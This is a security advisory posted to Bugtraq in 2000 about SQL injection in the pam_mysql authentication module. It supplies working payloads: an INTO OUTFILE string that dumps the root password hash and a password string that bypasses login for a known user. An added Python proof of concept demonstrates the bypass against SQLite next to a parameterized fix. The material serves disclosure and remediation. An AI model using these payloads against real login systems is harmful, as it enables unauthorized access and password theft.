Date:         Fri, 27 Oct 2000 00:45:26 +1000
From: Secure Reality Advisories <create@SECUREREALITY.COM.AU>
Subject:      (SRADV00004) Remote and local vulnerabilities in pam_mysql
To: BUGTRAQ@SECURITYFOCUS.COM

=================================================
Secure Reality Pty Ltd. Security Advisory #4 (SRADV00004)
http://www.securereality.com.au
=================================================

[Title]
Remote and local vulnerabilities in pam_mysql

[Released]
26/10/2000

[Vulnerable]
All versions of pam_mysql < 0.4.7

[Overview]
pam_mysql is a pluggable authentication module that allows user authentication
against MySQL databases. The module builds its SQL statements by pasting user
input (username and password) into the query text without escaping it. This
permits trivial SQL injection attacks, ranging from exposure of plaintext
passwords/hashes to remote unauthorized login, depending on the version.

[Impact]
- Versions < 0.4  = Possible local exposure of plaintext passwords/hashes
- Versions >= 0.4 = Remote unauthorized login

[Detail]
pam_mysql constructs SQL statements with snprintf, substituting the unescaped
user-supplied parameters for %s.

Versions < 0.4 used constructed statements like the following:
    select password from users where user = '<user>'
The selected password was then compared with the supplied one (after any
required hashing had been applied to the supplied password). Unlike some
other SQL servers, MySQL offers no way to terminate the statement and start
an entirely new one, so any attack must manipulate the part of the single
statement we control. In this case input like:
    root' into outfile '/tmp/r00tpassword
turns the statement into a SELECT ... INTO OUTFILE, so the root password
(cleartext or hash) is written by the MySQL server into the temporary
directory, where a local user can read it. This requires the MySQL account
used by pam_mysql to hold the FILE privilege (permission to write server
files), a relatively reliable proposition for this sort of security software.

Versions >= 0.4 use an alternative statement like the following:
    select user from users where user = '<user>' and password = '<pass>'
The module then checks that exactly one row is returned by this query. If we
can guess a username we can gain remote access to the server as any remotely
loggable user (dependent on pam_securetty.so and pam_nologin.so) with a
password string like the following (assuming 'bill' is a known valid
username):
    ' or user = 'bill
Because AND binds more tightly than OR, the resulting WHERE clause matches
bill's row regardless of the password, so exactly one row is returned and the
check passes.
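The following is an added example, not code from pam_mysql or from this
advisory. It reproduces both statement shapes described above (the < 0.4
password lookup and the >= 0.4 one-row check) and runs the >= 0.4 check
against an in-memory SQLite table that stands in for the MySQL users table
(assumption: same table and column names, plaintext passwords). The
"select ... into outfile" payload is only shown as the string the module
would send, since INTO OUTFILE is MySQL-specific and SQLite cannot execute
it. The sample users and passwords are constructed for the example. Bound
parameters (the "?" placeholders) are SQLite's way of keeping data out of the
statement text; the equivalent in the MySQL C API of the time is escaping the
input with mysql_real_escape_string() before the snprintf.

```python
"""pam_mysql query construction, vulnerable and hardened, against SQLite."""
import sqlite3

# Constructed sample data, not taken from any real system.
SAMPLE_USERS = [("bill", "s3cret"), ("root", "r00tpw")]


def open_db():
    """Create the stand-in users table in memory and populate it."""
    conn = sqlite3.connect(":memory:")
    conn.execute("create table users (user text, password text)")
    conn.executemany("insert into users values (?, ?)", SAMPLE_USERS)
    return conn


def query_lt_04(user):
    """Statement shape used by pam_mysql < 0.4: username pasted in via %s."""
    return "select password from users where user = '%s'" % user


def query_ge_04(user, password):
    """Statement shape used by pam_mysql >= 0.4: both inputs pasted in."""
    return ("select user from users where user = '%s' and password = '%s'"
            % (user, password))


def vulnerable_auth(conn, user, password):
    """>= 0.4 logic: build the statement by string pasting and accept the
    login if and only if exactly one row comes back."""
    rows = conn.execute(query_ge_04(user, password)).fetchall()
    return len(rows) == 1


def safe_auth(conn, user, password):
    """Same one-row check with bound parameters: a quote inside the
    password can no longer terminate the string literal."""
    rows = conn.execute(
        "select user from users where user = ? and password = ?",
        (user, password)).fetchall()
    return len(rows) == 1


if __name__ == "__main__":
    db = open_db()
    # < 0.4: the statement the module would send for the outfile payload.
    print(query_lt_04("root' into outfile '/tmp/r00tpassword"))
    # >= 0.4: known username plus injected password gives exactly one row.
    print(vulnerable_auth(db, "bill", "' or user = 'bill"))   # True
    # A blanket "or 1=1" returns every row, so the one-row check rejects it;
    # this is why the attacker needs a valid username.
    print(vulnerable_auth(db, "bill", "' or '1'='1"))          # False
    # The hardened form treats the payload as an ordinary (wrong) password.
    print(safe_auth(db, "bill", "' or user = 'bill"))          # False
    print(safe_auth(db, "bill", "s3cret"))                     # True
```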

[Fix]
Please upgrade to version 0.4.7 at
http://download.sourceforge.net/pam-mysql/pam_mysql-0.4.7.tar.gz

[Acknowledgements]
Our thanks to Steve Brown (Senior System Admin at DearDiary.net and
maintainer of pam_mysql) for his prompt and cooperative assistance in this
matter.

[Disclaimer]
Advice, directions and instructions on security vulnerabilities in this
advisory do not constitute: an endorsement of illegal behavior; a guarantee
that protection measures will work; an endorsement of any product or
solution or recommendations on behalf of Secure Reality Pty Ltd. Content is
provided as is and Secure Reality does not accept responsibility for any
damage or injury caused as a result of its use.